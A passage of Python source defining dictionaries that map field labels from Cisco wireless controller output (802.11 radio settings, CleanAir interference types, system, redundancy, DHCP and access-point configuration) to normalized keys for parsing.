'd_802_11ac_mcs_settings_nss_4_mcs_0_9',\n '802.11n Status:': 'd_802_11n_status',\n 'A-MPDU Tx:': 'd_802_11n_status_a_mpdu_tx',\n 'Priority 0': 'd_802_11n_status_a_mpdu_tx_priority_0',\n 'Priority 1': 'd_802_11n_status_a_mpdu_tx_priority_1',\n 'Priority 2': 'd_802_11n_status_a_mpdu_tx_priority_2',\n 'Priority 3': 'd_802_11n_status_a_mpdu_tx_priority_3',\n 'Priority 4': 'd_802_11n_status_a_mpdu_tx_priority_4',\n 'Priority 5': 'd_802_11n_status_a_mpdu_tx_priority_5',\n 'Priority 6': 'd_802_11n_status_a_mpdu_tx_priority_6',\n 'Priority 7': 'd_802_11n_status_a_mpdu_tx_priority_7',\n 'Aggregation scheduler': 'd_802_11n_status_a_mpdu_tx_aggregation_scheduler',\n 'Frame Burst': 'd_802_11n_status_a_mpdu_tx_frame_burst',\n 'Realtime Timeout': 'd_802_11n_status_a_mpdu_tx_frame_burst_realtime_timeout',\n 'Non Realtime Timeout': 'd_802_11n_status_a_mpdu_tx_frame_burst_non_realtime_timeout',\n 'A-MSDU Tx:': 'd_802_11n_status_a_msdu_tx',\n 'Priority 01': 'd_802_11n_status_a_msdu_tx_priority_0',\n 'Priority 11': 'd_802_11n_status_a_msdu_tx_priority_1',\n 'Priority 21': 'd_802_11n_status_a_msdu_tx_priority_2',\n 'Priority 31': 'd_802_11n_status_a_msdu_tx_priority_3',\n 'Priority 41': 'd_802_11n_status_a_msdu_tx_priority_4',\n 'Priority 51': 'd_802_11n_status_a_msdu_tx_priority_5',\n 'Priority 61': 'd_802_11n_status_a_msdu_tx_priority_6',\n 'Priority 71': 'd_802_11n_status_a_msdu_tx_priority_7',\n 'A-MSDU Max Subframes': 'd_802_11n_status_a_msdu_max_subframes',\n 'A-MSDU MAX Length': 'd_802_11n_status_a_msdu_max_length',\n 'Rifs Rx': 'd_802_11n_status_rifs_rx',\n 'Guard Interval': 'd_802_11n_status_guard_interval',\n 'Beacon Interval': 'beacon_interval',\n 'CF Pollable mandatory': 'cf_pollable_mandatory',\n 'CF Poll Request mandatory': 'cf_poll_request_mandatory',\n 'CFP Period': 'cfp_period',\n 'CFP Maximum Duration': 'cfp_maximum_duration',\n 'Default Channel': 'default_channel',\n 'Default Tx Power Level': 'default_tx_power_level',\n 'DTPC Status': 'dtpc_status',\n 'Fragmentation Threshold': 'fragmentation_threshold',\n 'RSSI Low Check': 'rssi_low_check',\n 'RSSI Threshold': 'rssi_threshold',\n 'TI Threshold': 'ti_threshold',\n 'Legacy Tx Beamforming setting': 'legacy_tx_beamforming_setting',\n 'Traffic Stream Metrics Status': 'traffic_stream_metrics_status',\n 'Expedited BW Request Status': 'expedited_bw_request_status',\n 'World Mode': 'world_mode',\n 'dfs-peakdetect': 'dfs_peakdetect',\n 'EDCA profile type': 'edca_profile_type',\n 'Voice MAC optimization status': 'voice_mac_optimization_status',\n 'Call Admission Control (CAC) configuration': 'call_admission_control_cac_configuration',\n 'Voice AC:': 'voice_ac',\n 'Voice AC - Admission control (ACM)': 'voice_ac_voice_ac_admission_control_acm',\n 'Voice Stream-Size': 'voice_ac_voice_stream_size',\n 'Voice Max-Streams': 'voice_ac_voice_max_streams',\n 'Voice max RF bandwidth': 'voice_ac_voice_max_rf_bandwidth',\n 'Voice reserved roaming bandwidth': 'voice_ac_voice_reserved_roaming_bandwidth',\n 'Voice CAC Method': 'voice_ac_voice_cac_method',\n 'Voice tspec inactivity timeout': 'voice_ac_voice_tspec_inactivity_timeout',\n 'CAC SIP-Voice configuration': 'cac_sip_voice_configuration',\n 'SIP based CAC': 'cac_sip_voice_configuration_sip_based_cac',\n 'SIP Codec Type': 'cac_sip_voice_configuration_sip_codec_type',\n 'SIP call bandwidth': 'cac_sip_voice_configuration_sip_call_bandwidth',\n 'SIP call bandwith sample-size': 'cac_sip_voice_configuration_sip_call_bandwith_sample_size',\n 'Video AC:': 'video_ac',\n 'Video AC - Admission control (ACM)': 'video_ac_video_ac_admission_control_acm',\n 'Video max RF bandwidth': 'video_ac_video_max_rf_bandwidth',\n 'Video reserved roaming bandwidth': 'video_ac_video_reserved_roaming_bandwidth',\n 'Video load-based CAC mode': 'video_ac_video_load_based_cac_mode',\n 'Video CAC Method': 'video_ac_video_cac_method',\n 'CAC SIP-Video Configuration': 'cac_sip_video_configuration',\n 'SIP based CAC1': 'cac_sip_video_configuration_sip_based_cac',\n 'Best-effort AC - Admission control (ACM)': 'cac_sip_video_configuration_best_effort_ac_admission_control_acm',\n 'Background AC - Admission control (ACM)': 'cac_sip_video_configuration_background_ac_admission_control_acm',\n 'Maximum Number of Clients per AP Radio': 'maximum_number_of_clients_per_ap_radio',\n 'L2Roam 802.11a RF Parameters': 'l2roam_802_11a_rf_parameters',\n 'Config Mode': 'l2roam_802_11a_rf_parameters_config_mode',\n 'Minimum RSSI': 'l2roam_802_11a_rf_parameters_minimum_rssi',\n 'Roam Hysteresis': 'l2roam_802_11a_rf_parameters_roam_hysteresis',\n 'Scan Threshold': 'l2roam_802_11a_rf_parameters_scan_threshold',\n 'Transition time': 'l2roam_802_11a_rf_parameters_transition_time',\n '802.11h Configuration': 'd_802_11h_configuration',\n 'Power Constraint': 'power_constraint',\n 'Channel Switch': 'channel_switch',\n 'Channel Mode': 'channel_mode',\n 'Smart DFS': 'smart_dfs',\n}\n\ncleanair_5g_parsing_dict = {\n 'Clean Air Solution': 'clean_air_solution',\n 'Air Quality Settings:': 'air_quality_settings',\n 'Air Quality Reporting': 'air_quality_settings_air_quality_reporting',\n 'Air Quality Reporting Period (min)': 'air_quality_settings_air_quality_reporting_period_min',\n 'Air Quality Alarms': 'air_quality_settings_air_quality_alarms',\n 'Air Quality Alarm Threshold': 'air_quality_settings_air_quality_alarms_air_quality_alarm_threshold',\n 'Unclassified Interference': 'air_quality_settings_air_quality_alarms_unclassified_interference',\n 'Unclassified Severity Threshold': 'air_quality_settings_air_quality_alarms_unclassified_severity_threshold',\n 'Interference Device Reporting': 'air_quality_settings_interference_device_reporting',\n 'Interference Device Types:': 'air_quality_settings_interference_device_types',\n 'TDD Transmitter': 'air_quality_settings_interference_device_types_tdd_transmitter',\n 'Jammer': 'air_quality_settings_interference_device_types_jammer',\n 'Continuous Transmitter': 'air_quality_settings_interference_device_types_continuous_transmitter',\n 'DECT-like Phone': 'air_quality_settings_interference_device_types_dect_like_phone',\n 'Video Camera': 'air_quality_settings_interference_device_types_video_camera',\n 'WiFi Inverted': 'air_quality_settings_interference_device_types_wifi_inverted',\n 'WiFi Invalid Channel': 'air_quality_settings_interference_device_types_wifi_invalid_channel',\n 'SuperAG': 'air_quality_settings_interference_device_types_superag',\n 'Canopy': 'air_quality_settings_interference_device_types_canopy',\n 'WiMax Mobile': 'air_quality_settings_interference_device_types_wimax_mobile',\n 'WiMax Fixed': 'air_quality_settings_interference_device_types_wimax_fixed',\n 'Interference Device Alarms': 'air_quality_settings_interference_device_alarms',\n 'Interference Device Types Triggering Alarms:': 'air_quality_settings_interference_device_types_triggering_alarms',\n 'TDD Transmitter1': 'air_quality_settings_interference_device_types_triggering_alarms_tdd_transmitter',\n 'Jammer1': 'air_quality_settings_interference_device_types_triggering_alarms_jammer',\n 'Continuous Transmitter1': 'air_quality_settings_interference_device_types_triggering_alarms_continuous_transmitter',\n 'DECT-like Phone1': 'air_quality_settings_interference_device_types_triggering_alarms_dect_like_phone',\n 'Video Camera1': 'air_quality_settings_interference_device_types_triggering_alarms_video_camera',\n 'WiFi Inverted1': 'air_quality_settings_interference_device_types_triggering_alarms_wifi_inverted',\n 'WiFi Invalid Channel1': 'air_quality_settings_interference_device_types_triggering_alarms_wifi_invalid_channel',\n 'SuperAG1': 'air_quality_settings_interference_device_types_triggering_alarms_superag',\n 'Canopy1': 'air_quality_settings_interference_device_types_triggering_alarms_canopy',\n 'WiMax Mobile1': 'air_quality_settings_interference_device_types_triggering_alarms_wimax_mobile',\n 'WiMax Fixed1': 'air_quality_settings_interference_device_types_triggering_alarms_wimax_fixed',\n 'Additional Clean Air Settings:': 'additional_clean_air_settings',\n 'CleanAir ED-RRM State': 'additional_clean_air_settings_cleanair_ed_rrm_state',\n 'CleanAir ED-RRM Sensitivity': 'additional_clean_air_settings_cleanair_ed_rrm_sensitivity',\n 'CleanAir ED-RRM Custom Threshold': 'additional_clean_air_settings_cleanair_ed_rrm_custom_threshold',\n 'CleanAir Rogue Contribution': 'additional_clean_air_settings_cleanair_rogue_contribution',\n 'CleanAir Rogue Duty-Cycle Threshold': 'additional_clean_air_settings_cleanair_rogue_duty_cycle_threshold',\n 'CleanAir Persistent Devices state': 'additional_clean_air_settings_cleanair_persistent_devices_state',\n 'CleanAir Persistent Device Propagation': 'additional_clean_air_settings_cleanair_persistent_device_propagation',\n}\n\ncleanair_24g_parsing_dict = {\n 'Clean Air Solution': 'clean_air_solution',\n 'Air Quality Settings:': 'air_quality_settings',\n 'Air Quality Reporting': 'air_quality_settings_air_quality_reporting',\n 'Air Quality Reporting Period (min)': 'air_quality_settings_air_quality_reporting_period_min',\n 'Air Quality Alarms': 'air_quality_settings_air_quality_alarms',\n 'Air Quality Alarm Threshold': 'air_quality_settings_air_quality_alarms_air_quality_alarm_threshold',\n 'Unclassified Interference': 'air_quality_settings_air_quality_alarms_unclassified_interference',\n 'Unclassified Severity Threshold': 'air_quality_settings_air_quality_alarms_unclassified_severity_threshold',\n 'Interference Device Reporting': 'air_quality_settings_interference_device_reporting',\n 'Interference Device Types:': 'air_quality_settings_interference_device_types',\n 'Bluetooth Link': 'air_quality_settings_interference_device_types_bluetooth_link',\n 'Microwave Oven': 'air_quality_settings_interference_device_types_microwave_oven',\n '802.11 FH': 'air_quality_settings_interference_device_types_802_11_fh',\n 'Bluetooth Discovery': 'air_quality_settings_interference_device_types_bluetooth_discovery',\n 'TDD Transmitter': 'air_quality_settings_interference_device_types_tdd_transmitter',\n 'Jammer': 'air_quality_settings_interference_device_types_jammer',\n 'Continuous Transmitter': 'air_quality_settings_interference_device_types_continuous_transmitter',\n 'DECT-like Phone': 'air_quality_settings_interference_device_types_dect_like_phone',\n 'Video Camera': 'air_quality_settings_interference_device_types_video_camera',\n '802.15.4': 'air_quality_settings_interference_device_types_802_15_4',\n 'WiFi Inverted': 'air_quality_settings_interference_device_types_wifi_inverted',\n 'WiFi Invalid Channel': 'air_quality_settings_interference_device_types_wifi_invalid_channel',\n 'SuperAG': 'air_quality_settings_interference_device_types_superag',\n 'Canopy': 'air_quality_settings_interference_device_types_canopy',\n 'Microsoft Device': 'air_quality_settings_interference_device_types_microsoft_device',\n 'WiMax Mobile': 'air_quality_settings_interference_device_types_wimax_mobile',\n 'WiMax Fixed': 'air_quality_settings_interference_device_types_wimax_fixed',\n 'BLE Beacon': 'air_quality_settings_interference_device_types_ble_beacon',\n 'Interference Device Alarms': 'air_quality_settings_interference_device_alarms',\n 'Interference Device Types Triggering Alarms:': 'air_quality_settings_interference_device_types_triggering_alarms',\n 'Bluetooth Link1': 'air_quality_settings_interference_device_types_triggering_alarms_bluetooth_link',\n 'Microwave Oven1': 'air_quality_settings_interference_device_types_triggering_alarms_microwave_oven',\n '802.11 FH1': 'air_quality_settings_interference_device_types_triggering_alarms_802_11_fh',\n 'Bluetooth Discovery1': 'air_quality_settings_interference_device_types_triggering_alarms_bluetooth_discovery',\n 'TDD Transmitter1': 'air_quality_settings_interference_device_types_triggering_alarms_tdd_transmitter',\n 'Jammer1': 'air_quality_settings_interference_device_types_triggering_alarms_jammer',\n 'Continuous Transmitter1': 'air_quality_settings_interference_device_types_triggering_alarms_continuous_transmitter',\n 'DECT-like Phone1': 'air_quality_settings_interference_device_types_triggering_alarms_dect_like_phone',\n 'Video Camera1': 'air_quality_settings_interference_device_types_triggering_alarms_video_camera',\n '802.15.41': 'air_quality_settings_interference_device_types_triggering_alarms_802_15_4',\n 'WiFi Inverted1': 'air_quality_settings_interference_device_types_triggering_alarms_wifi_inverted',\n 'WiFi Invalid Channel1': 'air_quality_settings_interference_device_types_triggering_alarms_wifi_invalid_channel',\n 'SuperAG1': 'air_quality_settings_interference_device_types_triggering_alarms_superag',\n 'Canopy1': 'air_quality_settings_interference_device_types_triggering_alarms_canopy',\n 'Microsoft Device1': 'air_quality_settings_interference_device_types_triggering_alarms_microsoft_device',\n 'WiMax Mobile1': 'air_quality_settings_interference_device_types_triggering_alarms_wimax_mobile',\n 'WiMax Fixed1': 'air_quality_settings_interference_device_types_triggering_alarms_wimax_fixed',\n 'BLE Beacon1': 'air_quality_settings_interference_device_types_triggering_alarms_ble_beacon',\n 'Additional Clean Air Settings:': 'additional_clean_air_settings',\n 'CleanAir ED-RRM State': 'additional_clean_air_settings_cleanair_ed_rrm_state',\n 'CleanAir ED-RRM Sensitivity': 'additional_clean_air_settings_cleanair_ed_rrm_sensitivity',\n 'CleanAir ED-RRM Custom Threshold': 'additional_clean_air_settings_cleanair_ed_rrm_custom_threshold',\n 'CleanAir Rogue Contribution': 'additional_clean_air_settings_cleanair_rogue_contribution',\n 'CleanAir Rogue Duty-Cycle Threshold': 'additional_clean_air_settings_cleanair_rogue_duty_cycle_threshold',\n 'CleanAir Persistent Devices state': 'additional_clean_air_settings_cleanair_persistent_devices_state',\n 'CleanAir Persistent Device Propagation': 'additional_clean_air_settings_cleanair_persistent_device_propagation',\n}\n\nsystem_info_parsing_dict = {\n 'Burned-in MAC Address': 'burned_in_mac_address',\n 'Maximum number of APs supported': 'maximum_number_of_aps_supported',\n 'System Information': 'system_information',\n 'Manufacturer': 'manufacturers_name',\n 'Product Name': 'product_name',\n 'Build Info': 'build_info',\n 'Product Version': 'product_version',\n 'RTOS Version': 'rtos_version',\n 'Bootloader Version': 'bootloader_version',\n 'Emergency Image Version': 'emergency_image_version',\n 'Field Recovery Image Version': 'field_recovery_image_version',\n 'Firmware Version': 'firmware_version',\n 'OUI File Update Time': 'oui_file_update_time',\n 'Build Type': 'build_type',\n 'OUI File Last Update Time': 'oui_file_last_update_time',\n 'Build Type1': 'build_type',\n 'System Name': 'system_name',\n 'System Location': 'system_location',\n 'System Contact': 'system_contact',\n 'System ObjectID': 'system_objectid',\n 'Redundancy Mode': 'redundancy_mode',\n 'IP Address': 'ip_address',\n 'IPv6 Address': 'ipv6_address',\n 'Last Reset': 'last_reset',\n 'System Up Time': 'system_up_time',\n 'System Timezone Location': 'system_timezone_location',\n 'System Stats Realtime Interval': 'system_stats_realtime_interval',\n 'System Stats Normal Interval': 'system_stats_normal_interval',\n 'Configured Country': 'configured_country',\n 'Operating Environment': 'operating_environment',\n 'Internal Temp Alarm Limits': 'internal_temp_alarm_limits',\n 'Internal Temperature': 'internal_temperature',\n 'Mgig Temp Alarm Limits': 'mgig_temp_alarm_limits',\n 'Mgig Temperature': 'mgig_temperature',\n 'External Temp Alarm Limits': 'external_temp_alarm_limits',\n 'External Temperature': 'external_temperature',\n 'Fan Status': 'fan_status',\n 'Fan Speed Mode': 'fan_speed_mode',\n 'Power Supply 1': 'power_supply_1',\n 'Power Supply 2': 'power_supply_2',\n 'State of 802.11b Network': 'state_of_802_11b_network',\n 'State of 802.11a Network': 'state_of_802_11a_network',\n 'Number of WLANs': 'number_of_wlans',\n 'Number of Active Clients': 'number_of_active_clients',\n 'OUI Classification Failure Count': 'oui_classification_failure_count',\n 'Memory Current Usage': 'memory_current_usage',\n 'Memory Average Usage': 'memory_average_usage',\n 'CPU Current Usage': 'cpu_current_usage',\n 'CPU Average Usage': 'cpu_average_usage',\n 'Flash Type': 'flash_type',\n 'Flash Size': 'flash_size',\n 'Maximum number of APs supported1': 'maximum_number_of_aps_supported',\n 'System Nas-Id': 'system_nas_id',\n 'WLC MIC Certificate Types': 'wlc_mic_certificate_types',\n 'Licensing Type': 'licensing_type',\n 'USB': 'licensing_type_usb',\n 'Backup Controller Configuration': 'backup_controller_configuration',\n 'AP primary Backup Controller': 'ap_primary_backup_controller',\n 'AP secondary Backup Controller': 'ap_secondary_backup_controller',\n 'Drive 0': 'raid_drive_0',\n 'Drive 1': 'raid_drive_1',\n}\n\nredundancy_mode_parsing_dict = {\n 'Redundancy Mode': 'redundancy_mode',\n 'Local State': 'local_state',\n 'Peer State': 'peer_state',\n 'Unit': 'unit',\n 'Unit ID': 'unit_id',\n 'Redunadancy State': 'redundancy_state', # Grammar error in some SW versions\n 'Redundancy State': 'redundancy_state',\n 'Mobility MAC': 'mobility_mac',\n 'Redundancy Management IP Address': 'redundancy_management_ip_address',\n 'Peer Redundancy Management IP Address': 'peer_redundancy_management_ip_address',\n 'Redundancy Port IP Address': 'redundancy_port_ip_address',\n 'Peer Redundancy Port IP Address': 'peer_redundancy_port_ip_address',\n 'Peer Service Port IP Address': 'peer_service_port_ip_address',\n}\n\ndhcp_server_parsing_dict = {\n 'DHCP Server IP Address:': 'ip_address',\n 'DHCP RX DISCOVER Count:': 'dhcp_rx_discover_count',\n 'DHCP TX DISCOVER Count:': 'dhcp_tx_discover_count',\n 'DHCP ACK Count:': 'dhcp_ack_count',\n 'DHCP REQUEST Count:': 'dhcp_request_count',\n 'DHCP INFORM Count:': 'dhcp_inform_count',\n 'DHCP DECLINE Count:': 'dhcp_decline_count',\n 'DHCP RELEASE Count:': 'dhcp_release_count',\n 'DHCP REPLY Count:': 'dhcp_reply_count',\n 'DHCP OFFER Count:': 'dhcp_offer_count',\n 'DHCP NAK Count:': 'dhcp_nak_count',\n 'Tx Fails:': 'tx_fails',\n 'Last Rx Time:': 'last_rx_time',\n 'Last Tx Time:': 'last_tx_time',\n}\n\nnearby_aps_parsing_dict = {\n 'Nearby AP': 'channel',\n}\n\nap_config_parsing_dict = {\n 'Cisco AP Identifier': 'cisco_ap_identifier',\n 'Cisco AP Name': 'cisco_ap_name',\n 'Country code': 'country_code',\n 'Regulatory Domain allowed by Country': 'regulatory_domain_allowed_by_country',\n 'AP Country code': 'ap_country_code',\n 'Wireless Logging State': 'wireless_logging_state',\n 'AP Regulatory Domain': 'ap_regulatory_domain',\n 'Switch Port Number': 'switch_port_number',\n 'MAC Address': 'mac_address',\n 'IP Address Configuration': 'ip_address_configuration',\n 'IP Address': 'ip_address',\n 'IP NetMask': 'ip_netmask',\n 'Gateway IP Addr': 'gateway_ip_addr',\n 'NAT External IP Address': 'nat_external_ip_address',\n 'CAPWAP Path MTU': 'capwap_path_mtu',\n 'DHCP Release Override': 'dhcp_release_override',\n 'Telnet State': 'telnet_state',\n 'Ssh State': 'ssh_state',\n 'Cisco AP Location': 'cisco_ap_location',\n 'Cisco AP Floor Label': 'cisco_ap_floor_label',\n 'Cisco AP Group Name': 'cisco_ap_group_name',\n 'Primary Cisco Switch Name': 'primary_cisco_switch_name',\n 'Primary Cisco Switch IP Address': 'primary_cisco_switch_ip_address',\n 'Secondary Cisco Switch Name': 'secondary_cisco_switch_name',\n 'Secondary Cisco Switch IP Address': 'secondary_cisco_switch_ip_address',\n 'Tertiary Cisco Switch Name': 'tertiary_cisco_switch_name',\n 'Tertiary Cisco Switch IP Address': 'tertiary_cisco_switch_ip_address',\n 'Administrative State': 'administrative_state',\n 'Operation State': 'operation_state',\n 'Mirroring Mode': 'mirroring_mode',\n 'AP Mode': 'ap_mode',\n 'Public Safety': 'public_safety',\n 'ATF Mode:': 'atf_mode',\n 'AP SubMode': 'ap_submode',\n 'Rogue Detection': 'rogue_detection',\n 'Remote AP Debug': 'remote_ap_debug',\n 'Logging trap severity level': 'logging_trap_severity_level',\n 'Logging syslog facility': 'logging_syslog_facility',\n 'S/W Version': 's_w_version',\n 'Boot Version': 'boot_version',\n 'Mini IOS Version': 'mini_ios_version',\n 'Stats Reporting Period': 'stats_reporting_period',\n 'Stats Collection Mode': 'stats_collection_mode',\n 'Radio Core Mode': 'radio_core_mode',\n 'Slub Debug Mode': 'slub_debug_mode',\n 'LED State': 'led_state',\n 'PoE Pre-Standard Switch': 'poe_pre_standard_switch',\n 'PoE Power Injector MAC Addr': 'poe_power_injector_mac_addr',\n 'Power Type/Mode': 'power_type_mode',\n 'Number Of Slots': 'number_of_slots',\n 'AP Model': 'ap_model',\n 'AP Image': 'ap_image',\n 'IOS Version': 'ios_version',\n 'Reset Button': 'reset_button',\n 'AP Serial Number': 'ap_serial_number',\n 'AP Certificate Type': 'ap_certificate_type',\n 'AP Lag Status': 'ap_lag_status',\n 'AP User Mode': 'ap_user_mode',\n 'AP User Name': 'ap_user_name',\n 'AP Dot1x User Mode': 'ap_dot1x_user_mode',\n 'AP Dot1x User Name': 'ap_dot1x_user_name',\n 'Cisco AP system logging host': 'cisco_ap_system_logging_host',\n 'AP Core Dump Config': 'ap_core_dump_config',\n 'AP Up Time': 'ap_up_time',\n 'AP LWAPP Up Time': 'ap_lwapp_up_time',\n 'Join Date and Time': 'join_date_and_time',\n 'Join Taken Time': 'join_taken_time',\n 'Attributes for Slot 0': 'slot_0',\n 'Radio Type': 'slot_0_radio_type',\n 'Radio Subtype': 'slot_0_radio_subtype',\n 'Assignment Method': 'slot_0_radio_role_assignment_method',\n 'Band': 'slot_0_radio_role_band',\n 'Current CCA Mode': 'slot_0_phy_dsss_parameters_current_cca_mode',\n 'ED Threshold': 'slot_0_phy_dsss_parameters_ed_threshold',\n 'Administrative State1': 'slot_0_administrative_state',\n 'Operation State1': 'slot_0_operation_state',\n 'Mesh Radio Role': 'slot_0_mesh_radio_role',\n 'Radio Role': 'slot_0_radio_role',\n 'CellId': 'slot_0_cellid',\n 'Station Configuration': 'slot_0_station_configuration',\n 'Configuration': 'slot_0_configuration',\n 'Number Of WLANs': 'slot_0_number_of_wlans',\n 'Medium Occupancy Limit': 'slot_0_medium_occupancy_limit',\n 'CFP Period': 'slot_0_cfp_period',\n 'CFP MaxDuration': 'slot_0_cfp_maxduration',\n 'BSSID': 'slot_0_bssid',\n 'Operation Rate Set': 'slot_0_operation_rate_set',\n '6000 Kilo Bits': 'slot_0_operation_rate_set_6000_kilo_bits',\n '9000 Kilo Bits': 'slot_0_operation_rate_set_9000_kilo_bits',\n '5500 Kilo Bits': 'slot_0_operation_rate_set_5500_kilo_bits',\n '1000 Kilo Bits': 'slot_0_operation_rate_set_1000_kilo_bits',\n '2000 Kilo Bits': 'slot_0_operation_rate_set_2000_kilo_bits',\n '11000 Kilo Bits': 'slot_0_operation_rate_set_11000_kilo_bits',\n '12000 Kilo Bits': 'slot_0_operation_rate_set_12000_kilo_bits',\n '18000 Kilo Bits': 'slot_0_operation_rate_set_18000_kilo_bits',\n '24000 Kilo Bits': 'slot_0_operation_rate_set_24000_kilo_bits',\n '36000 Kilo Bits': 'slot_0_operation_rate_set_36000_kilo_bits',\n '48000 Kilo Bits': 'slot_0_operation_rate_set_48000_kilo_bits',\n '54000 Kilo Bits': 'slot_0_operation_rate_set_54000_kilo_bits',\n 'MCS Set': 'slot_0_mcs_set',\n 'MCS 0': 'slot_0_mcs_set_mcs_0',\n 'MCS 1': 'slot_0_mcs_set_mcs_1',\n 'MCS 2': 'slot_0_mcs_set_mcs_2',\n 'MCS 3': 'slot_0_mcs_set_mcs_3',\n 'MCS 4': 'slot_0_mcs_set_mcs_4',\n 'MCS 5': 'slot_0_mcs_set_mcs_5',\n 'MCS 6': 'slot_0_mcs_set_mcs_6',\n 'MCS 7': 'slot_0_mcs_set_mcs_7',\n 'MCS 8': 'slot_0_mcs_set_mcs_8',\n 'MCS 9': 'slot_0_mcs_set_mcs_9',\n 'MCS 10': 'slot_0_mcs_set_mcs_10',\n 'MCS 11': 'slot_0_mcs_set_mcs_11',\n 'MCS 12': 'slot_0_mcs_set_mcs_12',\n 'MCS 13': 'slot_0_mcs_set_mcs_13',\n 'MCS 14': 'slot_0_mcs_set_mcs_14',\n 'MCS 15': 'slot_0_mcs_set_mcs_15',\n 'MCS 16': 'slot_0_mcs_set_mcs_16',\n 'MCS 17': 'slot_0_mcs_set_mcs_17',\n 'MCS 18': 'slot_0_mcs_set_mcs_18',\n 'MCS 19': 'slot_0_mcs_set_mcs_19',\n 'MCS 20': 'slot_0_mcs_set_mcs_20',\n 'MCS 21': 'slot_0_mcs_set_mcs_21',\n 'MCS 22': 'slot_0_mcs_set_mcs_22',\n 'MCS 23': 'slot_0_mcs_set_mcs_23',\n 'MCS 24': 'slot_0_mcs_set_mcs_24',\n 'MCS 25': 'slot_0_mcs_set_mcs_25',\n 'MCS 26': 'slot_0_mcs_set_mcs_26',\n 'MCS 27': 'slot_0_mcs_set_mcs_27',\n 'MCS 28': 'slot_0_mcs_set_mcs_28',\n 'MCS 29': 'slot_0_mcs_set_mcs_29',\n 'MCS 30': 'slot_0_mcs_set_mcs_30',\n 'MCS 31': 'slot_0_mcs_set_mcs_31',\n '802.11ac MCS Set': 'slot_0_802_11ac_mcs_set',\n 'Nss=1: MCS 0-9': 'slot_0_802_11ac_mcs_set_nss_1_mcs_0_9',\n 'Nss=2: MCS 0-9': 'slot_0_802_11ac_mcs_set_nss_2_mcs_0_9',\n 'Nss=3: MCS 0-9': 'slot_0_802_11ac_mcs_set_nss_3_mcs_0_9',\n 'Nss=4: MCS 0-7': 'slot_0_802_11ac_mcs_set_nss_4_mcs_0_7',\n 'Phy DSSS parameters': 'slot_0_phy_dsss_parameters',\n 'Rogue BSSID': 'slot_0_containment_count_rogue_bssid',\n 'Containment Type': 'slot_0_containment_count_rogue_bssid_containment_type',\n 'Channel Count': 'slot_0_containment_count_rogue_bssid_channel_count',\n 'Beacon Period': 'slot_0_beacon_period',\n 'Fragmentation Threshold': 'slot_0_fragmentation_threshold',\n 'Multi Domain Capability Implemented': 'slot_0_multi_domain_capability_implemented',\n 'Multi Domain Capability Enabled': 'slot_0_multi_domain_capability_enabled',\n 'Country String': 'slot_0_country_string',\n 'Multi Domain Capability': 'slot_0_multi_domain_capability',\n 'Configuration1': 'slot_0_multi_domain_capability_configuration',\n 'First Chan Num': 'slot_0_multi_domain_capability_first_chan_num',\n 'Number Of Channels': 'slot_0_multi_domain_capability_number_of_channels',\n 'MAC Operation Parameters': 'slot_0_mac_operation_parameters',\n 'Configuration2': 'slot_0_mac_operation_parameters_configuration',\n 'Fragmentation Threshold1': 'slot_0_mac_operation_parameters_fragmentation_threshold',\n 'Packet Retry Limit': 'slot_0_mac_operation_parameters_packet_retry_limit',\n 'Tx Power': 'slot_0_tx_power',\n 'Num Of Supported Power Levels': 'slot_0_tx_power_num_of_supported_power_levels',\n 'Tx Power Level 1': 'slot_0_tx_power_tx_power_level_1',\n 'Tx Power Level 2': 'slot_0_tx_power_tx_power_level_2',\n 'Tx Power Level 3': 'slot_0_tx_power_tx_power_level_3',\n 'Tx Power Level 4': 'slot_0_tx_power_tx_power_level_4',\n 'Tx Power Level 5': 'slot_0_tx_power_tx_power_level_5',\n 'Tx Power Level 6': 'slot_0_tx_power_tx_power_level_6',\n 'Tx Power Level 7': 'slot_0_tx_power_tx_power_level_7',\n 'Tx Power Level 8': 'slot_0_tx_power_tx_power_level_8',\n 'Tx Power Configuration': 'slot_0_tx_power_tx_power_configuration',\n 'Current Tx Power Level': 'slot_0_tx_power_current_tx_power_level',\n 'Tx Power Assigned By': 'slot_0_tx_power_tx_power_assigned_by',\n 'Phy OFDM parameters': 'slot_0_phy_ofdm_parameters',\n 'Configuration3': 'slot_0_phy_ofdm_parameters_configuration',\n 'Current Channel': 'slot_0_phy_ofdm_parameters_current_channel',\n 'Channel Assigned By': 'slot_0_phy_ofdm_parameters_channel_assigned_by',\n 'Extension Channel': 'slot_0_phy_ofdm_parameters_extension_channel',\n 'Channel Width': 'slot_0_phy_ofdm_parameters_channel_width',\n 'Allowed Channel List': 'slot_0_phy_ofdm_parameters_allowed_channel_list',\n '': 'slot_0_phy_ofdm_parameters_allowed_channel_list_',\n 'TI Threshold': 'slot_0_phy_ofdm_parameters_ti_threshold',\n 'DCA Channel List': 'slot_0_phy_ofdm_parameters_dca_channel_list',\n 'Legacy Tx Beamforming Configuration': 'slot_0_phy_ofdm_parameters_legacy_tx_beamforming_configuration',\n 'Legacy Tx Beamforming': 'slot_0_phy_ofdm_parameters_legacy_tx_beamforming',\n 'Antenna Type': 'slot_0_phy_ofdm_parameters_antenna_type',\n 'Internal Antenna Gain (in .5 dBi units)': 'slot_0_phy_ofdm_parameters_internal_antenna_gain_in_5_dbi_units',\n 'Diversity': 'slot_0_phy_ofdm_parameters_diversity',\n '802.11n Antennas': 'slot_0_phy_ofdm_parameters_802_11n_antennas',\n 'A': 'slot_0_phy_ofdm_parameters_802_11n_antennas_a',\n 'B': 'slot_0_phy_ofdm_parameters_802_11n_antennas_b',\n 'C': 'slot_0_phy_ofdm_parameters_802_11n_antennas_c',\n 'D': 'slot_0_phy_ofdm_parameters_802_11n_antennas_d',\n 'Performance Profile Parameters': 'slot_0_performance_profile_parameters',\n 'Configuration4': 'slot_0_performance_profile_parameters_configuration',\n 'Interference threshold': 'slot_0_performance_profile_parameters_interference_threshold',\n 'Noise threshold': 'slot_0_performance_profile_parameters_noise_threshold',\n 'RF utilization threshold': 'slot_0_performance_profile_parameters_rf_utilization_threshold',\n 'Data-rate threshold': 'slot_0_performance_profile_parameters_data_rate_threshold',\n 'Client threshold': 'slot_0_performance_profile_parameters_client_threshold',\n 'Coverage SNR threshold': 'slot_0_performance_profile_parameters_coverage_snr_threshold',\n 'Coverage exception level': 'slot_0_performance_profile_parameters_coverage_exception_level',\n 'Client minimum exception level': 'slot_0_performance_profile_parameters_client_minimum_exception_level',\n 'Rogue Containment Information': 'slot_0_rogue_containment_information',\n 'Containment Count': 'slot_0_containment_count',\n 'CleanAir Management Information': 'slot_0_cleanair_management_information',\n 'CleanAir Capable': 'slot_0_cleanair_management_information_cleanair_capable',\n 'CleanAir Management Administration St': 